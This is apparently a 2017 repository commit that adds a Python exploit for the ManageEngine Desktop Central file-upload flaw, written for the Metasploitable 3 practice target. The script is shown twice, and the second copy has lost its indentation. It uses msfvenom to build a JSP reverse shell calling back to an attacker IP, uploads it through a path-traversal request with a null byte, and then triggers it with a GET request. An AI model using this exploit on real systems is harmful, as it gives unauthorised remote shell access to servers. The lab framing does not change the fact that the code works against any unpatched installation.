joenorton8014 · August 19, 2017 12:31
diff --git a/manage-engine-exploit.py b/manage-engine-exploit.py
 #!/usr/bin/python
 import requests
 import os
 import subprocess
 import psutil
 import time
 import sys

 # A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
 # Based off - https://www.exploit-db.com/exploits/34594/
 # Meant for Metasploitable 3, hence the hardcoded msfvenom payload
 # Create's shell.jsp file on the attacker, reads the content, POSTs that to the server
 # and the subsequent GET executes the shell
 # No error checking!

 if len(sys.argv) < 4:
    print "\nUsage: " + sys.argv[0] + " <TARGET> + <TARGET_PORT> + <ATTACKER_IP> + <ATTACKER_PORT>\n"
    print "For example: ./manageengine-exploit.py 192.168.55.229 8022 10.0.0.35 5555\n"
    print "Make sure you're netcat listener is running on the attacker host before starting the exploit!\n"
    sys.exit()
 
 target = sys.argv[1]
 target_port = sys.argv[2]
 attacker = sys.argv[3]
 attacker_port = sys.argv[4]


 # POST parameters: 
 post = '/fileupload?connectionId=p/../../../../../jspf/shell.jsp%00&resourceId=p&action=rds_file_upload&computerName=tKPalt&customerId=978478'
 post_headers = {'Host': target + ':' + target_port,
 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
 'Content-Type': 'application/octet-stream',
 'Content-Length': '148298'
 }

 # GET parameters: 
 get = '/jspf/shell.jsp'
 get_headers = {'Host': target + ':' + target_port,
 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
 'Content-Type': 'application/x-www-form-urlencoded'
 }


 post_url = 'http://' + target + ':' + target_port + post
 get_url = 'http://' + target + ':' + target_port + get
 # Generate the shell.jsp file: 
 create_shell = 'msfvenom -p java/jsp_shell_reverse_tcp lhost=' + attacker + ' lport=' + attacker_port + ' -o shell.jsp'
 print "Generating shell.jsp"
 os.popen(create_shell)
 time.sleep(10)
 print "Shell generated, check your netcat listener!"
 # Read the contents of the shell.jsp file and place them in payload_data variable:
 with open('shell.jsp', 'r') as myfile:
    payload_data=myfile.read().replace('\n', '')

 # POST the shell: 
 r = requests.post(post_url, data = payload_data)
 # GET the shell: 
 r = requests.get(get_url, headers = get_headers)
	#!/usr/bin/python
	import requests
	import os
	import subprocess
	import psutil
	import time
	import sys

	# A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
	# Based off - https://www.exploit-db.com/exploits/34594/
	# Meant for Metasploitable 3, hence the hardcoded msfvenom payload
	# Create's shell.jsp file on the attacker, reads the content, POSTs that to the server
	# and the subsequent GET executes the shell
	# No error checking!

	if len(sys.argv) < 4:
	print "\nUsage: " + sys.argv[0] + " <TARGET> + <TARGET_PORT> + <ATTACKER_IP> + <ATTACKER_PORT>\n"
	print "For example: ./manageengine-exploit.py 192.168.55.229 8022 10.0.0.35 5555\n"
	print "Make sure you're netcat listener is running on the attacker host before starting the exploit!\n"
	sys.exit()

	target = sys.argv[1]
	target_port = sys.argv[2]
	attacker = sys.argv[3]
	attacker_port = sys.argv[4]


	# POST parameters:
	post = '/fileupload?connectionId=p/../../../../../jspf/shell.jsp%00&resourceId=p&action=rds_file_upload&computerName=tKPalt&customerId=978478'
	post_headers = {'Host': target + ':' + target_port,
	'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
	'Content-Type': 'application/octet-stream',
	'Content-Length': '148298'
	}

	# GET parameters:
	get = '/jspf/shell.jsp'
	get_headers = {'Host': target + ':' + target_port,
	'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
	'Content-Type': 'application/x-www-form-urlencoded'
	}


	post_url = 'http://' + target + ':' + target_port + post
	get_url = 'http://' + target + ':' + target_port + get
	# Generate the shell.jsp file:
	create_shell = 'msfvenom -p java/jsp_shell_reverse_tcp lhost=' + attacker + ' lport=' + attacker_port + ' -o shell.jsp'
	print "Generating shell.jsp"
	os.popen(create_shell)
	time.sleep(10)
	print "Shell generated, check your netcat listener!"
	# Read the contents of the shell.jsp file and place them in payload_data variable:
	with open('shell.jsp', 'r') as myfile:
	payload_data=myfile.read().replace('\n', '')

	# POST the shell:
	r = requests.post(post_url, data = payload_data)
	# GET the shell:
	r = requests.get(get_url, headers = get_headers)